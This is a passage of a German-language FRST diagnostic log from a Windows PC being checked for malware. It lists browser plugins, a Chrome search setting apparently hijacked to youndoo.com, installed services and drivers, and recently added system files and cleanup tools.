FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_25_0_0_171.dll [2017-05-12] ()
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2013-09-16] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2013-09-16] (Intel Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-05-01] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-05-01] (Google Inc.)

Chrome:
=======
CHR DefaultProfile: ChromeDefaultData
CHR HomePage: ChromeDefaultData -> hxxps://www.google.com/
CHR DefaultSearchURL: ChromeDefaultData -> hxxp://www.youndoo.com/search/?q={searchTerms}&z=29cb5008ab1dbbc7820f6fbg3z6b7q2c9gde0o1b9q&from=wak&uid=SamsungXSSDX850XPROX256GB_S251NSAG301960E&type=sp
CHR DefaultSearchKeyword: ChromeDefaultData -> youndoo
CHR Profile: C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData [2017-02-05] <==== ACHTUNG
CHR Extension: (Google Präsentationen) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-11-22]
CHR Extension: (Google Docs) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\aohghmighlieiainnegkcijnfilokake [2015-11-22]
CHR Extension: (Google Drive) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-11-22]
CHR Extension: (YouTube) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-11-22]
CHR Extension: (Google-Suche) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-11-22]
CHR Extension: (Google Tabellen) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-11-22]
CHR Extension: (Google Docs Offline) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2015-11-22]
CHR Extension: (CrowdBar) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\lhinknkceoifkecnmmlgnelmdipmbcdn [2015-11-22]
CHR Extension: (Chrome Web Store-Zahlungen) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-11-22]
CHR Extension: (Google Mail) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-11-22]
CHR HKLM-x32\...\Chrome\Extension: [gannpgaobkkhmpomoijebaigcapoeebl] - hxxps://clients2.google.com/service/update2/crx

==================== Dienste (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R2 asComSvc; C:\Program Files (x86)\ASUS\AXSP\1.01.02\atkexComSvc.exe [936728 2013-07-04] ()
R2 ASGT; C:\Windows\SysWOW64\ASGT.exe [55296 2012-01-17] () [Datei ist nicht signiert]
R2 asHmComSvc; C:\Program Files (x86)\ASUS\AAHM\1.00.22\aaHMSvc.exe [954648 2014-09-09] (ASUSTeK Computer Inc.)
R2 AsusFanControlService; C:\Program Files (x86)\ASUS\AsusFanControlService\1.06.13\AsusFanControlService.exe [384000 2014-10-11] (ASUSTeK Computer Inc.)
[Datei ist nicht signiert] S3 EasyAntiCheat; C:\WINDOWS\SysWOW64\EasyAntiCheat.exe [409128 2017-02-23] (EasyAntiCheat Ltd) S3 ElfoService; D:\Programme\ElsterFormular Update Service\bin\ElfoService.exe [1283304 2017-03-20] () R2 Intel(R) Capability Licensing Service Interface; C:\Program Files\Intel\iCLS Client\HeciServer.exe [747520 2013-08-27] (Intel(R) Corporation) [Datei ist nicht signiert] S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [828376 2013-08-27] (Intel(R) Corporation) R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [169432 2013-09-16] (Intel Corporation) R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [4470736 2017-05-09] (Malwarebytes) S3 Origin Client Service; C:\Program Files (x86)\Origin\OriginClientService.exe [2007048 2015-08-22] (Electronic Arts) R2 ProductAgentService; C:\Program Files\Bitdefender Agent\ProductAgentService.exe [1230824 2017-02-22] (Bitdefender) S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [3913064 2017-03-20] (Microsoft Corporation) R2 ss_conn_service; C:\Program Files (x86)\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe [754784 2016-07-22] (DEVGURU Co., LTD.) 
R2 UPDATESRV; C:\Program Files\Bitdefender\Bitdefender 2017\updatesrv.exe [218416 2017-04-24] (Bitdefender) R2 VSSERV; C:\Program Files\Bitdefender\Bitdefender 2017\vsserv.exe [1424224 2017-05-02] (Bitdefender) R2 vsservp; C:\Program Files\Bitdefender\Bitdefender 2017\vsservp.exe [524872 2016-08-25] (Bitdefender) S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [342264 2017-03-18] (Microsoft Corporation) S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [102816 2017-03-18] (Microsoft Corporation) ===================== Treiber (Nicht auf der Ausnahmeliste) ====================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) R2 amdacpksd; C:\WINDOWS\system32\drivers\amdacpksd.sys [305392 2016-04-05] (Advanced Micro Devices) S0 amdkmafd; C:\WINDOWS\System32\drivers\amdkmafd.sys [49448 2016-08-18] (Advanced Micro Devices, Inc.) R3 amdkmdag; C:\WINDOWS\System32\DriverStore\FileRepository\c0313676.inf_amd64_96bbc33bec5c7fae\atikmdag.sys [36558208 2017-05-16] (Advanced Micro Devices, Inc.) R3 amdkmdap; C:\WINDOWS\System32\DriverStore\FileRepository\c0313676.inf_amd64_96bbc33bec5c7fae\atikmpag.sys [528760 2017-05-16] (Advanced Micro Devices, Inc.) 
R1 AsIO; C:\Windows\SysWow64\drivers\AsIO.sys [15232 2013-07-04] () R3 AtiHDAudioService; C:\WINDOWS\system32\drivers\AtihdWT6.sys [110088 2017-03-31] (Advanced Micro Devices) R0 avc3; C:\WINDOWS\System32\DRIVERS\avc3.sys [1605376 2016-09-20] (BitDefender) R3 avckf; C:\WINDOWS\System32\DRIVERS\avckf.sys [878072 2016-09-20] (BitDefender) S0 bdelam; C:\WINDOWS\System32\drivers\bdelam.sys [23672 2016-03-14] (Bitdefender) R1 bdfwfpf; C:\Program Files\Common Files\Bitdefender\Bitdefender Firewall\bdfwfpf.sys [128400 2016-06-24] (BitDefender LLC) R1 BDVEDISK; C:\WINDOWS\system32\DRIVERS\bdvedisk.sys [87912 2015-12-04] (BitDefender) S3 dg_ssudbus; C:\WINDOWS\system32\DRIVERS\ssudbus.sys [131712 2016-09-05] (Samsung Electronics Co., Ltd.) R1 ESProtectionDriver; C:\WINDOWS\system32\drivers\mbae64.sys [77440 2017-05-09] () R0 gzflt; C:\WINDOWS\System32\DRIVERS\gzflt.sys [182944 2016-10-29] (BitDefender LLC) R0 ignis; C:\WINDOWS\system32\DRIVERS\ignis.sys [305120 2017-03-20] (Bitdefender) R3 IOMap; C:\WINDOWS\system32\drivers\IOMap64.sys [24824 2014-10-23] (ASUSTeK Computer Inc.) R2 MBAMChameleon; C:\WINDOWS\system32\drivers\MBAMChameleon.sys [187320 2017-05-22] (Malwarebytes) R3 MBAMFarflt; C:\WINDOWS\system32\drivers\farflt.sys [113592 2017-05-22] (Malwarebytes) R3 MBAMProtection; C:\WINDOWS\system32\drivers\mbam.sys [43968 2017-05-22] (Malwarebytes) R0 MBAMSwissArmy; C:\WINDOWS\System32\drivers\MBAMSwissArmy.sys [251832 2017-05-22] (Malwarebytes) R3 MBAMWebProtection; C:\WINDOWS\system32\drivers\mwac.sys [93624 2017-05-22] (Malwarebytes) R3 MEIx64; C:\WINDOWS\system32\DRIVERS\TeeDriverx64.sys [99288 2013-09-16] (Intel Corporation) R1 NNSALPC; C:\WINDOWS\system32\DRIVERS\NNSALPC.sys [103824 2015-07-17] (Panda Security, S.L.) R1 NNSHTTP; C:\WINDOWS\system32\DRIVERS\NNSHTTP.sys [211352 2015-07-17] (Panda Security, S.L.) R1 NNSHTTPS; C:\WINDOWS\system32\DRIVERS\NNSHTTPS.sys [120216 2015-07-17] (Panda Security, S.L.) 
R1 NNSIDS; C:\WINDOWS\system32\DRIVERS\NNSIDS.sys [120208 2015-07-17] (Panda Security, S.L.) R1 NNSNAHSL; C:\WINDOWS\system32\DRIVERS\NNSNAHSL.sys [58616 2015-06-19] (Panda Security, S.L.) R1 NNSPICC; C:\WINDOWS\system32\DRIVERS\NNSPICC.sys [112536 2015-07-17] (Panda Security, S.L.) R1 NNSPIHSW; C:\WINDOWS\system32\DRIVERS\NNSPIHSW.sys [89472 2015-09-01] (Panda Security, S.L.) R1 NNSPOP3; C:\WINDOWS\system32\DRIVERS\NNSPOP3.sys [133528 2015-07-17] (Panda Security, S.L.) R1 NNSPROT; C:\WINDOWS\system32\DRIVERS\NNSPROT.sys [309648 2015-07-17] (Panda Security, S.L.) R1 NNSPRV; C:\WINDOWS\system32\DRIVERS\NNSPRV.sys [179608 2015-07-17] (Panda Security, S.L.) R1 NNSSMTP; C:\WINDOWS\system32\DRIVERS\NNSSMTP.sys [122776 2015-07-17] (Panda Security, S.L.) R1 NNSSTRM; C:\WINDOWS\system32\DRIVERS\NNSSTRM.sys [267160 2015-07-17] (Panda Security, S.L.) R1 NNSTLSC; C:\WINDOWS\system32\DRIVERS\NNSTLSC.sys [115600 2015-07-17] (Panda Security, S.L.) R2 PSINAflt; C:\WINDOWS\System32\DRIVERS\PSINAflt.sys [173464 2015-07-22] (Panda Security, S.L.) R2 PSINFile; C:\WINDOWS\System32\DRIVERS\PSINFile.sys [130968 2015-07-22] (Panda Security, S.L.) R1 PSINKNC; C:\WINDOWS\system32\DRIVERS\PSINKNC.sys [207256 2015-07-22] (Panda Security, S.L.) R2 PSINProc; C:\WINDOWS\System32\DRIVERS\PSINProc.sys [133528 2015-07-22] (Panda Security, S.L.) R2 PSINProt; C:\WINDOWS\System32\DRIVERS\PSINProt.sys [143768 2015-07-22] (Panda Security, S.L.) R2 PSINReg; C:\WINDOWS\system32\DRIVERS\PSINReg.sys [117144 2015-07-22] (Panda Security, S.L.) S3 PSKMAD; C:\WINDOWS\System32\DRIVERS\PSKMAD.sys [62080 2015-06-16] (Panda Security, S.L.) R3 ScpVBus; C:\WINDOWS\System32\drivers\ScpVBus.sys [39168 2013-05-05] (Scarlet.Crush Productions) S3 SDFRd; C:\WINDOWS\System32\drivers\SDFRd.sys [31128 2017-03-18] () S3 ssudmdm; C:\WINDOWS\system32\DRIVERS\ssudmdm.sys [165504 2016-09-05] (Samsung Electronics Co., Ltd.) R0 trufos; C:\WINDOWS\System32\DRIVERS\trufos.sys [520032 2016-06-22] (BitDefender S.R.L.) 
S3 WdBoot; C:\WINDOWS\system32\drivers\WdBoot.sys [44632 2017-03-18] (Microsoft Corporation) S3 WdFilter; C:\WINDOWS\system32\drivers\WdFilter.sys [294816 2017-03-18] (Microsoft Corporation) S3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [121248 2017-03-18] (Microsoft Corporation) S2 RtNdPt630; \SystemRoot\system32\DRIVERS\RtNdPt630.sys [X] S3 RTTEAMPT; \SystemRoot\system32\DRIVERS\RtTeam620.sys [X] S3 RTVLANPT; \SystemRoot\system32\DRIVERS\RtVlan620.sys [X] ==================== NetSvcs (Nicht auf der Ausnahmeliste) =================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) ==================== Ein Monat: Erstellte Dateien und Ordner ======== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.) 2017-05-22 18:29 - 2017-05-22 18:29 - 00005487 _____ C:\Users\Dino\Desktop\Mbam.txt 2017-05-22 18:29 - 2017-05-22 18:29 - 00000000 ___HD C:\OneDriveTemp 2017-05-22 18:25 - 2017-05-22 18:29 - 00251832 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys 2017-05-22 18:25 - 2017-05-22 18:29 - 00113592 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\farflt.sys 2017-05-22 18:25 - 2017-05-22 18:29 - 00093624 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mwac.sys 2017-05-22 18:25 - 2017-05-22 18:29 - 00043968 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys 2017-05-22 18:25 - 2017-05-22 18:25 - 00187320 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMChameleon.sys 2017-05-22 18:25 - 2017-05-22 18:25 - 00001912 _____ C:\Users\Public\Desktop\Malwarebytes.lnk 2017-05-22 18:25 - 2017-05-22 18:25 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes 2017-05-22 18:25 - 2017-05-22 18:25 - 00000000 ____D C:\ProgramData\Malwarebytes 2017-05-22 18:25 - 2017-05-22 18:25 - 00000000 ____D C:\Program Files\Malwarebytes 2017-05-22 18:25 - 2017-05-09 16:37 - 00077440 _____ 
C:\WINDOWS\system32\Drivers\mbae64.sys 2017-05-22 18:15 - 2017-05-22 18:10 - 04102600 _____ C:\Users\Dino\Desktop\AdwCleaner_6.046.exe 2017-05-22 18:13 - 2017-05-22 18:19 - 00000000 ____D C:\AdwCleaner 2017-05-21 21:26 - 2017-05-21 21:31 - 00285358 _____ C:\TDSSKiller.3.1.0.15_21.05.2017_21.26.49_log.txt 2017-05-21 21:24 - 2017-05-22 18:36 - 00022170 _____ C:\Users\Dino\Desktop\FRST.txt 2017-05-21 21:24 - 2017-05-22 18:35 - 00049308 _____ C:\Users\Dino\Desktop\Addition.txt 2017-05-21 21:23 - 2017-05-21 21:24 - 00005376 _____ C:\TDSSKiller.3.1.0.15_21.05.2017_21.23.57_log.txt 2017-05-21 21:19 - 2017-05-21 21:04 - 02429952 _____ (Farbar) C:\Users\Dino\Desktop\FRST64.exe 2017-05-21 21:19 - 2017-05-21 20:48 - 04922400 _____ (AO Kaspersky Lab) C:\Users\Dino\Desktop\tdsskiller.exe 2017-05-21 21:00 - 2017-05-21 21:19 - 00285358 _____ C:\TDSSKiller.3.1.0.15_21.05.2017_21.00.59_log.txt 2017-05-21 20:51 - 2017-05-21 20:51 - 00000492 _____ C:\TDSSKiller.3.1.0.15_21.05.2017_20.51.38_log.txt 2017-05-19 14:28 - 2017-05-22 18:36 - 00000000 ____D C:\FRST 2017-05-17 21:18 - 2017-05-17 21:18 - 00003160 _____ C:\WINDOWS\System32\Tasks\StartCN 2017-05-17 21:18 - 2017-05-17 21:18 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Settings 2017-05-16 18:06 - 2017-05-16 18:06 - 00121208 _____ (Khronos Group) C:\WINDOWS\system32\OpenCL.dll 2017-05-16 18:06 - 2017-05-16 18:06 - 00112000 _____ (Khronos Group) C:\WINDOWS\SysWOW64\OpenCL.dll 2017-05-16 18:06 - 2017-05-16 18:06 - 00029056 _____ (Microsoft Corporation) C:\WINDOWS\system32\detoured.dll 2017-05-16 18:06 - 2017-05-16 18:06 - 00029048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\detoured.dll 2017-05-09 21:39 - 2017-04-28 03:38 - 01411128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32full.dll 2017-05-09 21:39 - 2017-04-28 03:19 - 01839872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll 2017-05-09 21:39 - 2017-04-28 03:19 - 00605936 _____ (Microsoft Corporation) 
C:\WINDOWS\SysWOW64\oleaut32.dll 2017-05-09 21:39 - 2017-04-28 03:18 - 02259760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreUIComponents.dll 2017-05-09 21:39 - 2017-04-28 03:16 - 00599576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kernel32.dll 2017-05-09 21:39 - 2017-04-28 03:12 - 01604312 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32full.dll 2017-05-09 21:39 - 2017-04-28 03:12 - 00543640 _____ (Microsoft Corporation) C:\WINDOWS\system32\securekernel.exe 2017-05-09 21:39 - 2017-04-28 03:11 - 02158544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll 2017-05-09 21:39 - 2017-04-28 03:09 - 01557288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\crypt32.dll 2017-05-09 21:39 - 2017-04-28 03:08 - 08320920 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe 2017-05-09 21:39 - 2017-04-28 03:08 - 02399728 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll 2017-05-09 21:39 - 2017-04-28 03:08 - 02330520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\combase.dll 2017-05-09 21:39 - 2017-04-28 03:08 - 00775824 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleaut32.dll 2017-05-09 21:39 - 2017-04-28 03:07 - 06759512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll 2017-05-09 21:39 - 2017-04-28 03:07 - 00988168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ole32.dll 2017-05-09 21:39 - 2017-04-28 03:06 - 02969880 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreUIComponents.dll 2017-05-09 21:39 - 2017-04-28 03:06 - 00708712 _____ (Microsoft Corporation) C:\WINDOWS\system32\kernel32.dll 2017-05-09 21:39 - 2017-04-28 03:05 - 00923040 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreMessaging.dll 2017-05-09 21:39 - 2017-04-28 03:04 - 00583160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreMessaging.dll 2017-05-09 21:39 - 2017-04-28 03:03 - 00667040 _____ (Microsoft Corporation) C:\WINDOWS\system32\ci.dll 2017-05-09 21:39 - 2017-04-28 03:00 - 02444192 
_____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys 2017-05-09 21:39 - 2017-04-28 02:59 - 05477088 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneCoreUAPCommonProxyStub.dll 2017-05-09 21:39 - 2017-04-28 02:59 - 02635336 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll 2017-05-09 21:39 - 2017-04-28 02:59 - 00388000 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBXHCI.SYS 2017-05-09 21:39 - 2017-04-28 02:59 - 00207264 _____ (Microsoft Corporation) C:\WINDOWS\system32\browserbroker.dll 2017-05-09 21:39 - 2017-04-28 02:59 - 00027040 _____ (Microsoft Corporation) C:\WINDOWS\system32\browser_broker.exe 2017-05-09 21:39 - 2017-04-28 02:58 - 01852776 _____ (Microsoft Corporation) C:\WINDOWS\system32\crypt32.dll 2017-05-09 21:39 - 2017-04-28 02:58 - 00872472 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipSVC.dll 2017-05-09 21:39 - 2017-04-28 02:57 - 03116184 _____ (Microsoft Corporation) C:\WINDOWS\system32\combase.dll 2017-05-09 21:39 - 2017-04-28 02:56 - 07904784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll 2017-05-09 21:39 - 2017-04-28 02:55 - 21353200 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll 2017-05-09 21:39 - 2017-04-28 02:55 - 01325456 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll 2017-05-09 21:39 - 2017-04-28 02:53 - 00387928 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmpps.dll 2017-05-09 21:39 - 2017-04-28 02:52 - 02957824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys 2017-05-09 21:39 - 2017-04-28 02:52 - 00790528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.dll 2017-05-09 21:39 - 2017-04-28 02:52 - 00584192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIRibbonRes.dll 2017-05-09 21:39 - 2017-04-28 02:51 - 20505600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll 2017-05-09 21:39 - 2017-04-28 02:49 - 00072192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tdc.ocx 
2017-05-09 21:39 - 2017-04-28 02:49 - 00025088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\odbcconf.dll 2017-05-09 21:39 - 2017-04-28 02:46 - 19335168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll 2017-05-09 21:39 - 2017-04-28 02:46 - 00329728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webplatstorageserver.dll 2017-05-09 21:39 - 2017-04-28 02:46 - 00080384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtmled.dll 2017-05-09 21:39 - 2017-04-28 02:45 - 00124928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iepeers.dll 2017-05-09 21:39 - 2017-04-28 02:44 - 00338432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iedkcs32.dll 2017-05-09 21:39 - 2017-04-28 02:44 - 00266240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxtrans.dll 2017-05-09 21:39 - 2017-04-28 02:42 - 00806400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\StoreAgent.dll 2017-05-09 21:39 - 2017-04-28 02:42 - 00663040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll 2017-05-09 21:39 - 2017-04-28 02:42 - 00636416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WpcWebFilter.dll 2017-05-09 21:39 - 2017-04-28 02:42 - 00367104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgentUserBroker.exe 2017-05-09 21:39 - 2017-04-28 02:41 - 01248768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AzureSettingSyncProvider.dll 2017-05-09 21:39 - 2017-04-28 02:40 - 11870208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll 2017-05-09 21:39 - 2017-04-28 02:40 - 06292992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll 2017-05-09 21:39 - 2017-04-28 02:40 - 02008576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl 2017-05-09 21:39 - 2017-04-28 02:40 - 00799232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TokenBroker.dll 2017-05-09 21:39 - 2017-04-28 02:40 - 00328704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgent.exe 2017-05-09 21:39 - 2017-04-28 02:40 - 00050176 _____ (Microsoft Corporation) 
C:\WINDOWS\SysWOW64\cldapi.dll 2017-05-09 21:39 - 2017-04-28 02:39 - 05225984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d2d1.dll 2017-05-09 21:39 - 2017-04-28 02:39 - 03655680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll 2017-05-09 21:39 - 2017-04-28 02:39 - 02859520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll 2017-05-09 21:39 - 2017-04-28 02:38 - 03667456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DCompiler_47.dll 2017-05-09 21:39 - 2017-04-28 02:38 - 01019904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aadtb.dll 2017-05-09 21:39 - 2017-04-28 02:37 - 04559360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dbgeng.dll 2017-05-09 21:39 - 2017-04-28 02:37 - 01626624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll 2017-05-09 21:39 - 2017-04-28 02:34 - 00891904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\autochk.exe 2017-05-09 21:39 - 2017-04-28 02:33 - 00089088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\olepro32.dll 2017-05-09 21:39 - 2017-04-28 02:26 - 23677440 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll 2017-05-09 21:39 - 2017-04-28 02:15 - 03672064 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys 2017-05-09 21:39 - 2017-04-28 02:15 - 01051648 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.dll 2017-05-09 21:39 - 2017-04-28 02:14 - 00584192 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIRibbonRes.dll 2017-05-09 21:39 - 2017-04-28 02:11 - 00082944 _____ (Microsoft Corporation) C:\WINDOWS\system32\tdc.ocx 2017-05-09 21:39 - 2017-04-28 02:11 - 00035840 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\BasicRender.sys 2017-05-09 21:39 - 2017-04-28 02:11 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\system32\odbcconf.dll 2017-05-09 21:39 - 2017-04-28 02:09 - 00084992 _____ (Microsoft Corporation) C:\WINDOWS\system32\MshtmlDac.dll 2017-05-09 21:39 - 2017-04-28 02:09 - 00064512 _____ (Microsoft Corporation) 
C:\WINDOWS\system32\winsrv.dll 2017-05-09 21:39 - 2017-04-28 02:08 - 00457728 _____ (Microsoft Corporation) C:\WINDOWS\system32\webplatstorageserver.dll 2017-05-09 21:39 - 2017-04-28 02:08 - 00314880 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsEnvironment.Desktop.dll 2017-05-09 21:39 - 2017-04-28 02:08 - 00096256 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtmled.dll 2017-05-09 21:39 - 2017-04-28 02:07 - 00140288 _____ (Microsoft Corporation) C:\WINDOWS\system32\iepeers.dll 2017-05-09 21:39 - 2017-04-28 02:06 - 01302528 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVPXENC.dll 2017-05-09 21:39 - 2017-04-28 02:06 - 00527360 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadcloudap.dll 2017-05-09 21:39 - 2017-04-28 02:06 - 00386560 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll 2017-05-09 21:39 - 2017-04-28 02:06 - 00274944 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxtrans.dll 2017-05-09 21:39 - 2017-04-28 02:05 - 01075712 _____ (Microsoft Corporation) C:\WINDOWS\system32\StoreAgent.dll 2017-05-09 21:39 - 2017-04-28 02:05 - 00224256 _____ (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe 2017-05-09 21:39 - 2017-04-28 02:04 - 23681024 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll 2017-05-09 21:39 - 2017-04-28 02:04 - 01878016 _____ (Microsoft Corporation) C:\WINDOWS\system32\AzureSettingSyncProvider.dll 2017-05-09 21:39 - 2017-04-28 02:04 - 00422400 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpAXHolder.dll 2017-05-09 21:39 - 2017-04-28 02:04 - 00416256 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgentUserBroker.exe 2017-05-09 21:39 - 2017-04-28 02:03 - 01085440 _____ (Microsoft Corporation) C:\WINDOWS\system32\rpcss.dll 2017-05-09 21:39 - 2017-04-28 02:03 - 01027584 _____ (Microsoft Corporation) C:\WINDOWS\system32\modernexecserver.dll 2017-05-09 21:39 - 2017-04-28 02:03 - 00925696 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcWebFilter.dll 2017-05-09 21:39 - 
